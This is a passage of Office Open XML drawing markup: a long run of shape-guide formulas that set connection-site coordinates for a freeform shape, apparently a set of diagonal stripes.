              <a:gd name="connsiteX314" fmla="*/ 19301096 w 23952872"/>
              <a:gd name="connsiteY314" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX315" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY315" fmla="*/ 7645891 h 26946982"/>
              <a:gd name="connsiteX316" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY316" fmla="*/ 7278839 h 26946982"/>
              <a:gd name="connsiteX317" fmla="*/ 19668144 w 23952872"/>
              <a:gd name="connsiteY317" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX318" fmla="*/ 19548114 w 23952872"/>
              <a:gd name="connsiteY318" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX319" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY319" fmla="*/ 7398868 h 26946982"/>
              <a:gd name="connsiteX320" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY320" fmla="*/ 7031816 h 26946982"/>
              <a:gd name="connsiteX321" fmla="*/ 19915168 w 23952872"/>
              <a:gd name="connsiteY321" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX322" fmla="*/ 19795138 w 23952872"/>
              <a:gd name="connsiteY322" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX323" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY323" fmla="*/ 7151845 h 26946982"/>
              <a:gd name="connsiteX324" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY324" fmla="*/ 6784792 h 26946982"/>
              <a:gd name="connsiteX325" fmla="*/ 20162191 w 23952872"/>
              <a:gd name="connsiteY325" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX326" fmla="*/ 20042161 w 23952872"/>
              <a:gd name="connsiteY326" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX327" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY327" fmla="*/ 6904821 h 26946982"/>
              <a:gd name="connsiteX328" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY328" fmla="*/ 6537769 h 26946982"/>
              <a:gd name="connsiteX329" fmla="*/ 20409215 w 23952872"/>
              <a:gd name="connsiteY329" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX330" fmla="*/ 20289185 w 23952872"/>
              <a:gd name="connsiteY330" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX331" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY331" fmla="*/ 6657797 h 26946982"/>
              <a:gd name="connsiteX332" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY332" fmla="*/ 6290745 h 26946982"/>
              <a:gd name="connsiteX333" fmla="*/ 20656238 w 23952872"/>
              <a:gd name="connsiteY333" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX334" fmla="*/ 20536210 w 23952872"/>
              <a:gd name="connsiteY334" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX335" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY335" fmla="*/ 6410774 h 26946982"/>
              <a:gd name="connsiteX336" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY336" fmla="*/ 6043722 h 26946982"/>
              <a:gd name="connsiteX337" fmla="*/ 20903262 w 23952872"/>
              <a:gd name="connsiteY337" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX338" fmla="*/ 20783233 w 23952872"/>
              <a:gd name="connsiteY338" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX339" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY339" fmla="*/ 6163751 h 26946982"/>
              <a:gd name="connsiteX340" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY340" fmla="*/ 5796695 h 26946982"/>
              <a:gd name="connsiteX341" fmla="*/ 21150288 w 23952872"/>
              <a:gd name="connsiteY341" fmla="*/ 26946976 h 26946982"/>
              <a:gd name="connsiteX342" fmla="*/ 21030257 w 23952872"/>
              <a:gd name="connsiteY342" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX343" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY343" fmla="*/ 5916727 h 26946982"/>
              <a:gd name="connsiteX344" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY344" fmla="*/ 5549674 h 26946982"/>
              <a:gd name="connsiteX345" fmla="*/ 21397309 w 23952872"/>
              <a:gd name="connsiteY345" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX346" fmla="*/ 21277283 w 23952872"/>
              <a:gd name="connsiteY346" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX347" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY347" fmla="*/ 5669703 h 26946982"/>
              <a:gd name="connsiteX348" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY348" fmla="*/ 5302651 h 26946982"/>
              <a:gd name="connsiteX349" fmla="*/ 21644338 w 23952872"/>
              <a:gd name="connsiteY349" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX350" fmla="*/ 21524306 w 23952872"/>
              <a:gd name="connsiteY350" fmla="*/ 26946982 h 26946982"/>
              <a:gd name="connsiteX351" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY351" fmla="*/ 5422680 h 26946982"/>
              <a:gd name="connsiteX352" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY352" fmla="*/ 5055625 h 26946982"/>
              <a:gd name="connsiteX353" fmla="*/ 21891359 w 23952872"/>
              <a:gd name="connsiteY353" fmla="*/ 26946982 h 26946982"/>
              <a:gd name="connsiteX354" fmla="*/ 21771333 w 23952872"/>
              <a:gd name="connsiteY354" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX355" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY355" fmla="*/ 5175656 h 26946982"/>
              <a:gd name="connsiteX356" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY356" fmla="*/ 4808604 h 26946982"/>
              <a:gd name="connsiteX357" fmla="*/ 22138379 w 23952872"/>
              <a:gd name="connsiteY357" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX358" fmla="*/ 22018356 w 23952872"/>
              <a:gd name="connsiteY358" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX359" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY359" fmla="*/ 4928633 h 26946982"/>
              <a:gd name="connsiteX360" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY360" fmla="*/ 4561580 h 26946982"/>
              <a:gd name="connsiteX361" fmla="*/ 22385403 w 23952872"/>
              <a:gd name="connsiteY361" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX362" fmla="*/ 22265374 w 23952872"/>
              <a:gd name="connsiteY362" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX363" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY363" fmla="*/ 4681609 h 26946982"/>
              <a:gd name="connsiteX364" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY364" fmla="*/ 4314557 h 26946982"/>
              <a:gd name="connsiteX365" fmla="*/ 22632426 w 23952872"/>
              <a:gd name="connsiteY365" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX366" fmla="*/ 22512398 w 23952872"/>
              <a:gd name="connsiteY366" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX367" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY367" fmla="*/ 4434588 h 26946982"/>
              <a:gd name="connsiteX368" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY368" fmla="*/ 4067533 h 26946982"/>
              <a:gd name="connsiteX369" fmla="*/ 22879450 w 23952872"/>
              <a:gd name="connsiteY369" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX370" fmla="*/ 22759421 w 23952872"/>
              <a:gd name="connsiteY370" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX371" fmla="*/ 0 w 23952872"/>
              <a:gd name="connsiteY371" fmla="*/ 4187559 h 26946982"/>
              <a:gd name="connsiteX372" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY372" fmla="*/ 3820510 h 26946982"/>
              <a:gd name="connsiteX373" fmla="*/ 23126473 w 23952872"/>
              <a:gd name="connsiteY373" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX374" fmla="*/ 23006445 w 23952872"/>
              <a:gd name="connsiteY374" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX375" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY375" fmla="*/ 3940541 h 26946982"/>
              <a:gd name="connsiteX376" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY376" fmla="*/ 3573492 h 26946982"/>
              <a:gd name="connsiteX377" fmla="*/ 23373491 w 23952872"/>
              <a:gd name="connsiteY377" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX378" fmla="*/ 23253463 w 23952872"/>
              <a:gd name="connsiteY378" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX379" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY379" fmla="*/ 3693521 h 26946982"/>
              <a:gd name="connsiteX380" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY380" fmla="*/ 3326468 h 26946982"/>
              <a:gd name="connsiteX381" fmla="*/ 23620515 w 23952872"/>
              <a:gd name="connsiteY381" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX382" fmla="*/ 23500486 w 23952872"/>
              <a:gd name="connsiteY382" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX383" fmla="*/ 8 w 23952872"/>
              <a:gd name="connsiteY383" fmla="*/ 3446502 h 26946982"/>
              <a:gd name="connsiteX384" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY384" fmla="*/ 3079445 h 26946982"/>
              <a:gd name="connsiteX385" fmla="*/ 23867538 w 23952872"/>
              <a:gd name="connsiteY385" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX386" fmla="*/ 23747515 w 23952872"/>
              <a:gd name="connsiteY386" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX387" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY387" fmla="*/ 3199468 h 26946982"/>
              <a:gd name="connsiteX388" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY388" fmla="*/ 2832427 h 26946982"/>
              <a:gd name="connsiteX389" fmla="*/ 23952872 w 23952872"/>
              <a:gd name="connsiteY389" fmla="*/ 26785295 h 26946982"/>
              <a:gd name="connsiteX390" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY390" fmla="*/ 26905324 h 26946982"/>
              <a:gd name="connsiteX391" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY391" fmla="*/ 2952458 h 26946982"/>
              <a:gd name="connsiteX392" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY392" fmla="*/ 2585397 h 26946982"/>
              <a:gd name="connsiteX393" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY393" fmla="*/ 26538263 h 26946982"/>
              <a:gd name="connsiteX394" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY394" fmla="*/ 26658294 h 26946982"/>
              <a:gd name="connsiteX395" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY395" fmla="*/ 2705426 h 26946982"/>
              <a:gd name="connsiteX396" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY396" fmla="*/ 2338374 h 26946982"/>
              <a:gd name="connsiteX397" fmla="*/ 23952872 w 23952872"/>
              <a:gd name="connsiteY397" fmla="*/ 26291236 h 26946982"/>
              <a:gd name="connsiteX398" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY398" fmla="*/ 26411265 h 26946982"/>
              <a:gd name="connsiteX399" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY399" fmla="*/ 2458403 h 26946982"/>
              <a:gd name="connsiteX400" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY400" fmla="*/ 2091350 h 26946982"/>
              <a:gd name="connsiteX401" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY401" fmla="*/ 26044215 h 26946982"/>
              <a:gd name="connsiteX402" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY402" fmla="*/ 26164253 h 26946982"/>
              <a:gd name="connsiteX403" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY403" fmla="*/ 2211385 h 26946982"/>
              <a:gd name="connsiteX404" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY404" fmla="*/ 1844332 h 26946982"/>
              <a:gd name="connsiteX405" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY405" fmla="*/ 25797198 h 26946982"/>
              <a:gd name="connsiteX406" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY406" fmla="*/ 25917226 h 26946982"/>
              <a:gd name="connsiteX407" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY407" fmla="*/ 1964361 h 26946982"/>
              <a:gd name="connsiteX408" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY408" fmla="*/ 1597300 h 26946982"/>
              <a:gd name="connsiteX409" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY409" fmla="*/ 25550168 h 26946982"/>
              <a:gd name="connsiteX410" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY410" fmla="*/ 25670197 h 26946982"/>
              <a:gd name="connsiteX411" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY411" fmla="*/ 1717336 h 26946982"/>
              <a:gd name="connsiteX412" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY412" fmla="*/ 1350280 h 26946982"/>
              <a:gd name="connsiteX413" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY413" fmla="*/ 25303145 h 26946982"/>
              <a:gd name="connsiteX414" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY414" fmla="*/ 25423176 h 26946982"/>
              <a:gd name="connsiteX415" fmla="*/ 0 w 23952872"/>
              <a:gd name="connsiteY415" fmla="*/ 1470306 h 26946982"/>
              <a:gd name="connsiteX416" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY416" fmla="*/ 1103265 h 26946982"/>
              <a:gd name="connsiteX417" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY417" fmla="*/ 25056133 h 26946982"/>
              <a:gd name="connsiteX418" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY418" fmla="*/ 25176150 h 26946982"/>
              <a:gd name="connsiteX419" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY419" fmla="*/ 1223285 h 26946982"/>
              <a:gd name="connsiteX420" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY420" fmla="*/ 856241 h 26946982"/>
              <a:gd name="connsiteX421" fmla="*/ 23952872 w 23952872"/>
              <a:gd name="connsiteY421" fmla="*/ 24809106 h 26946982"/>
              <a:gd name="connsiteX422" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY422" fmla="*/ 24929126 h 26946982"/>
              <a:gd name="connsiteX423" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY423" fmla="*/ 976261 h 26946982"/>
              <a:gd name="connsiteX424" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY424" fmla="*/ 609215 h 26946982"/>
              <a:gd name="connsiteX425" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY425" fmla="*/ 24562080 h 26946982"/>
              <a:gd name="connsiteX426" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY426" fmla="*/ 24682097 h 26946982"/>
              <a:gd name="connsiteX427" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY427" fmla="*/ 729232 h 26946982"/>
              <a:gd name="connsiteX428" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY428" fmla="*/ 362185 h 26946982"/>
              <a:gd name="connsiteX429" fmla="*/ 23952872 w 23952872"/>
              <a:gd name="connsiteY429" fmla="*/ 24315048 h 26946982"/>
              <a:gd name="connsiteX430" fmla="*/ 23952872 w 23952872"/>
              <a:gd name="connsiteY430" fmla="*/ 24435087 h 26946982"/>
              <a:gd name="connsiteX431" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY431" fmla="*/ 482219 h 26946982"/>
              <a:gd name="connsiteX432" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY432" fmla="*/ 115162 h 26946982"/>
              <a:gd name="connsiteX433" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY433" fmla="*/ 24068027 h 26946982"/>
              <a:gd name="connsiteX434" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY434" fmla="*/ 24188066 h 26946982"/>
              <a:gd name="connsiteX435" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY435" fmla="*/ 235202 h 26946982"/>
              <a:gd name="connsiteX436" fmla="*/ 20634699 w 23952872"/>
              <a:gd name="connsiteY436" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX437" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY437" fmla="*/ 3318175 h 26946982"/>
              <a:gd name="connsiteX438" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY438" fmla="*/ 3438193 h 26946982"/>
              <a:gd name="connsiteX439" fmla="*/ 20514677 w 23952872"/>
              <a:gd name="connsiteY439" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX440" fmla="*/ 23725953 w 23952872"/>
              <a:gd name="connsiteY440" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX441" fmla="*/ 23845980 w 23952872"/>
              <a:gd name="connsiteY441" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX442" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY442" fmla="*/ 106891 h 26946982"/>
              <a:gd name="connsiteX443" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY443" fmla="*/ 226919 h 26946982"/>
              <a:gd name="connsiteX444" fmla="*/ 23478929 w 23952872"/>
              <a:gd name="connsiteY444" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX445" fmla="*/ 23598962 w 23952872"/>
              <a:gd name="connsiteY445" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX446" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY446" fmla="*/ 353909 h 26946982"/>
              <a:gd name="connsiteX447" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY447" fmla="*/ 473942 h 26946982"/>
              <a:gd name="connsiteX448" fmla="*/ 23231917 w 23952872"/>
              <a:gd name="connsiteY448" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX449" fmla="*/ 23351944 w 23952872"/>
              <a:gd name="connsiteY449" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX450" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY450" fmla="*/ 600927 h 26946982"/>
              <a:gd name="connsiteX451" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY451" fmla="*/ 720955 h 26946982"/>
              <a:gd name="connsiteX452" fmla="*/ 22984876 w 23952872"/>
              <a:gd name="connsiteY452" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX453" fmla="*/ 23104912 w 23952872"/>
              <a:gd name="connsiteY453" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX454" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY454" fmla="*/ 847959 h 26946982"/>
              <a:gd name="connsiteX455" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY455" fmla="*/ 967992 h 26946982"/>
              <a:gd name="connsiteX456" fmla="*/ 22857891 w 23952872"/>
              <a:gd name="connsiteY456" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX457" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY457" fmla="*/ 1094980 h 26946982"/>
              <a:gd name="connsiteX458" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY458" fmla="*/ 1215010 h 26946982"/>
              <a:gd name="connsiteX459" fmla="*/ 22737861 w 23952872"/>
              <a:gd name="connsiteY459" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX460" fmla="*/ 22490835 w 23952872"/>
              <a:gd name="connsiteY460" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX461" fmla="*/ 22610871 w 23952872"/>
              <a:gd name="connsiteY461" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX462" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY462" fmla="*/ 1342001 h 26946982"/>
              <a:gd name="connsiteX463" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY463" fmla="*/ 1462033 h 26946982"/>
              <a:gd name="connsiteX464" fmla="*/ 22243833 w 23952872"/>
              <a:gd name="connsiteY464" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX465" fmla="*/ 22363867 w 23952872"/>
              <a:gd name="connsiteY465" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX466" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY466" fmla="*/ 1589001 h 26946982"/>
              <a:gd name="connsiteX467" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY467" fmla="*/ 1709037 h 26946982"/>
              <a:gd name="connsiteX468" fmla="*/ 22116832 w 23952872"/>
              <a:gd name="connsiteY468" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX469" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY469" fmla="*/ 1836039 h 26946982"/>
              <a:gd name="connsiteX470" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY470" fmla="*/ 1956050 h 26946982"/>
              <a:gd name="connsiteX471" fmla="*/ 21996824 w 23952872"/>
              <a:gd name="connsiteY471" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX472" fmla="*/ 21749786 w 23952872"/>
              <a:gd name="connsiteY472" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX473" fmla="*/ 21869803 w 23952872"/>
              <a:gd name="connsiteY473" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX474" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY474" fmla="*/ 2083068 h 26946982"/>
              <a:gd name="connsiteX475" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY475" fmla="*/ 2203084 h 26946982"/>
              <a:gd name="connsiteX476" fmla="*/ 21622790 w 23952872"/>
              <a:gd name="connsiteY476" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX477" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY477" fmla="*/ 2330081 h 26946982"/>
              <a:gd name="connsiteX478" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY478" fmla="*/ 2450116 h 26946982"/>
              <a:gd name="connsiteX479" fmla="*/ 21502754 w 23952872"/>
              <a:gd name="connsiteY479" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX480" fmla="*/ 21255733 w 23952872"/>
              <a:gd name="connsiteY480" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX481" fmla="*/ 21375778 w 23952872"/>
              <a:gd name="connsiteY481" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX482" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY482" fmla="*/ 2577090 h 26946982"/>
              <a:gd name="connsiteX483" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY483" fmla="*/ 2697134 h 26946982"/>
              <a:gd name="connsiteX484" fmla="*/ 21128748 w 23952872"/>
              <a:gd name="connsiteY484" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX485" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY485" fmla="*/ 2824121 h 26946982"/>
              <a:gd name="connsiteX486" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY486" fmla="*/ 2944158 h 26946982"/>
              <a:gd name="connsiteX487" fmla="*/ 21008713 w 23952872"/>
              <a:gd name="connsiteY487" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX488" fmla="*/ 20881709 w 23952872"/>
              <a:gd name="connsiteY488" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX489" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY489" fmla="*/ 3071162 h 26946982"/>
              <a:gd name="connsiteX490" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY490" fmla="*/ 3191170 h 26946982"/>
              <a:gd name="connsiteX491" fmla="*/ 20761700 w 23952872"/>
              <a:gd name="connsiteY491" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX492" fmla="*/ 20267634 w 23952872"/>
              <a:gd name="connsiteY492" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX493" fmla="*/ 20387686 w 23952872"/>
              <a:gd name="connsiteY493" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX494" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY494" fmla="*/ 3565184 h 26946982"/>
              <a:gd name="connsiteX495" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY495" fmla="*/ 3685234 h 26946982"/>
              <a:gd name="connsiteX496" fmla="*/ 19773592 w 23952872"/>
              <a:gd name="connsiteY496" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX497" fmla="*/ 19893631 w 23952872"/>
              <a:gd name="connsiteY497" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX498" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY498" fmla="*/ 4059240 h 26946982"/>
              <a:gd name="connsiteX499" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY499" fmla="*/ 4179278 h 26946982"/>
              <a:gd name="connsiteX500" fmla="*/ 19526569 w 23952872"/>
              <a:gd name="connsiteY500" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX501" fmla="*/ 19646593 w 23952872"/>
              <a:gd name="connsiteY501" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX502" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY502" fmla="*/ 4306277 h 26946982"/>
              <a:gd name="connsiteX503" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY503" fmla="*/ 4426302 h 26946982"/>
              <a:gd name="connsiteX504" fmla="*/ 19032539 w 23952872"/>
              <a:gd name="connsiteY504" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX505" fmla="*/ 19152560 w 23952872"/>
              <a:gd name="connsiteY505" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX506" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY506" fmla="*/ 4800307 h 26946982"/>
              <a:gd name="connsiteX507" fmla="*/ 23952865 w 23952872"/>
              <a:gd name="connsiteY507" fmla="*/ 4920329 h 26946982"/>
              <a:gd name="connsiteX508" fmla="*/ 18785510 w 23952872"/>
              <a:gd name="connsiteY508" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX509" fmla="*/ 18905523 w 23952872"/>
              <a:gd name="connsiteY509" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX510" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY510" fmla="*/ 5047348 h 26946982"/>
              <a:gd name="connsiteX511" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY511" fmla="*/ 5167360 h 26946982"/>
              <a:gd name="connsiteX512" fmla="*/ 18411484 w 23952872"/>
              <a:gd name="connsiteY512" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX513" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY513" fmla="*/ 5541383 h 26946982"/>
              <a:gd name="connsiteX514" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY514" fmla="*/ 5661411 h 26946982"/>
              <a:gd name="connsiteX515" fmla="*/ 18291460 w 23952872"/>
              <a:gd name="connsiteY515" fmla="*/ 6 h 26946982"/>
              <a:gd name="connsiteX516" fmla="*/ 18164455 w 23952872"/>
              <a:gd name="connsiteY516" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX517" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY517" fmla="*/ 5788415 h 26946982"/>
              <a:gd name="connsiteX518" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY518" fmla="*/ 5908436 h 26946982"/>
              <a:gd name="connsiteX519" fmla="*/ 18044436 w 23952872"/>
              <a:gd name="connsiteY519" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX520" fmla="*/ 16929343 w 23952872"/>
              <a:gd name="connsiteY520" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX521" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY521" fmla="*/ 7023527 h 26946982"/>
              <a:gd name="connsiteX522" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY522" fmla="*/ 7143564 h 26946982"/>
              <a:gd name="connsiteX523" fmla="*/ 16809307 w 23952872"/>
              <a:gd name="connsiteY523" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX524" fmla="*/ 20140638 w 23952872"/>
              <a:gd name="connsiteY524" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX525" fmla="*/ 23952869 w 23952872"/>
